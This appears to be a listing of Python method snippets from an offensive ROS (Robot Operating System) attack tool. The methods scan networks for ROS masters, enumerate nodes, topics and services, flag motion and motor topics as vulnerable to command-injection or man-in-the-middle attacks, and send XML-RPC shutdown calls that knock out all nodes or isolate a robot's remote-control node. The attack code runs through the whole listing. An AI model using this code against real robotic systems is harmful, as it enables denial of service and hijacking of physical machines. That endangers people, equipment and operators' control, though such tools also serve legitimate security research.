Example #1
0
    def topicAnalyser(self, host, port, attack):
        """ sorts and prints topic and message type information """

        vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power']
        exploitable_topics = []
        rpc = api.XMLRPC_API(host, port)
        topics = rpc.getTopicTypes()

        if len(topics) > 0 and attack == 'ACI':
            [exploitable_topics.append(topic) for topic in topics if topic[0] in vulnerable_topics]

            if len(exploitable_topics) > 0:
                os.system('clear')
                cprint("\r[+] Topics on target that are vulnerable for ACI attack:", 'green', attrs=['bold'])
                counter = 1
                for topic in exploitable_topics:
                    print("    [" + str(counter) + "] '{}' with message type '{}'".
                                  format(topic[0], topic[1]))
                    counter += 1
            return exploitable_topics

        elif len(topics) > 0 and attack == 'MITM':
            for topic in topics:
                if topic[0] == '/cmd_vel':
                    return True
Example #2
0
    def execShutdown(self, host, port, nodes):
        """ executing the shutdown XML API """

        while True:
            try:
                option = int(input("\nSelect node to shutdown: "))
                if option in range(len(nodes) + 1):
                    rpc = api.XMLRPC_API(host, port)
                    rpc.shutdown(nodes[(option - 1)][1])
                    os.system('clear')
                    print(
                        colored(
                            "[+] Successfully send shutdown command to node: {}"
                            .format(nodes[(option - 1)][0]),
                            'green',
                            attrs=['bold']))
                    break

                else:
                    sys.stdout.write(colored("\r[!] Invalid input", 'red'))
                    time.sleep(1.5)

            except ValueError:
                sys.stdout.write(colored("\r[!] Invalid input", 'red'))
                time.sleep(1.5)
Example #3
0
    def systemRecon(self):
        """ sorts and prints getSystemState() information """

        active_nodes = []
        for host, port in self.master_hosts:
            rpc = api.XMLRPC_API(host, port)
            publisher, subscriber, service = rpc.getSystemState()
            [active_nodes.append(publisher[n][1][0]) for n in range(len(publisher)) if publisher[n][1][0] not in active_nodes]
            [active_nodes.append(subscriber[n][1][0]) for n in range(len(subscriber)) if subscriber[n][1][0] not in active_nodes]

            cprint("[+] Enumeration of ROS environment " + host + " successfully completed:\n", 'green', attrs=['bold'])

            teller = 1
            for node in active_nodes:
                print(colored("  [" + str(teller) + "] Node: " + node, 'cyan', attrs=['bold']))
                print(colored("        Publishing to:", 'white', attrs=['bold']))
                for pub in publisher:
                    if node in pub[1]:
                        print("             " + pub[0])
                print(colored("\n        Subscribed to:", 'white', attrs=['bold']))
                for sub in subscriber:
                    if node in sub[1]:
                        print("             " + sub[0])
                print(colored("\n        Services:", 'white', attrs=['bold']))
                for srv in service:
                    if node in srv[1]:
                        print("             " + srv[0])
                print()
                teller += 1
Example #4
0
    def execDoS(self, host, port):
        """ shutting down nodes """

        rpc = api.XMLRPC_API(host, port)
        nodes = rpc.filterNodes()
        if len(nodes) > 0:
            for node in nodes:
                rpc.shutdown(node[1])
Example #5
0
    def isolateRC(self, host, port, rc_node):
        """ executes targeted DoS attack to isolate the remote control host """

        rpc = api.XMLRPC_API(host, port)
        nodes = rpc.filterNodes()
        if len(nodes) > 0:
            for node in nodes:
                if rc_node[0] == node[0]:
                    rpc.shutdown(node[1])
Example #6
0
    def defaultMasterFinder(self):
        """ determine default ROS Master  """

        active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(),
                                              11311).nmapScan()
        active_hosts = [
            h for h in active_hosts if h != self.ipscan.ipGateway()
        ]
        if len(active_hosts) > 0:
            for host in active_hosts:
                rpc = api.XMLRPC_API(host, 11311)
                if rpc.masterCheck() == True:
                    self.found_master_hosts.append([host, 11311])
Example #7
0
    def nodesAnalyser(self, host, port):
        """ sorts and prints node, URI and PID information """

        rpc = api.XMLRPC_API(host, port)
        nodes = rpc.filterNodes()

        if len(nodes) > 0:
            os.system('clear')
            cprint("\r[+] Running node(s) on target:", 'green', attrs=['bold'])
            counter = 1
            for node in nodes:
                print("    [" + str(counter) + "] Node: {} \n      URI: {} \n      PID: {}".
                              format(node[0], node[1], node[2]))
                counter += 1
        return nodes
Example #8
0
    def topicRecon(self):
        """ sorts and prints getTopicTypes() information """

        vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power']
        for host, port in self.master_hosts:
            rpc = api.XMLRPC_API(host, port)
            topics = rpc.getTopicTypes()

            if len(topics) > 0:
                cprint("\n[+] Identified topics and message types on target: {}".format(host), 'green', attrs=['bold'])
                counter = 1
                for topic in topics:
                    if topic[0] in vulnerable_topics:
                        cprint("    [" + str(counter) + "] [VULNERABLE] '{}' with message type '{}'".
                              format(topic[0], topic[1]), 'red')
                        counter += 1
                    else:
                        print("    [" + str(counter) + "] '{}' with message type '{}'".format(topic[0], topic[1]))
                        counter += 1
            else:
                cprint("\n[-] No active topics are found on the target system: {}".format(host), 'red', attrs=['bold'])
Example #9
0
    def definedMasterFinder(self):
        """ determine custom defined ROS Master """

        for port in range((self.port_range_start + self.port_range_counter),
                          self.port_range_end):
            self.port_range_counter += 1
            if port == 11311:
                continue

            self.temp_masters_bin = []
            active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(),
                                                  port).nmapScan()
            active_hosts = [
                h for h in active_hosts if h != self.ipscan.ipGateway()
            ]
            if len(active_hosts) > 0:
                for host in active_hosts:
                    rpc = api.XMLRPC_API(host, port)
                    if rpc.masterCheck() == True:
                        self.found_master_hosts.append([host, port])
                        self.temp_masters_bin.append([host, port])
                return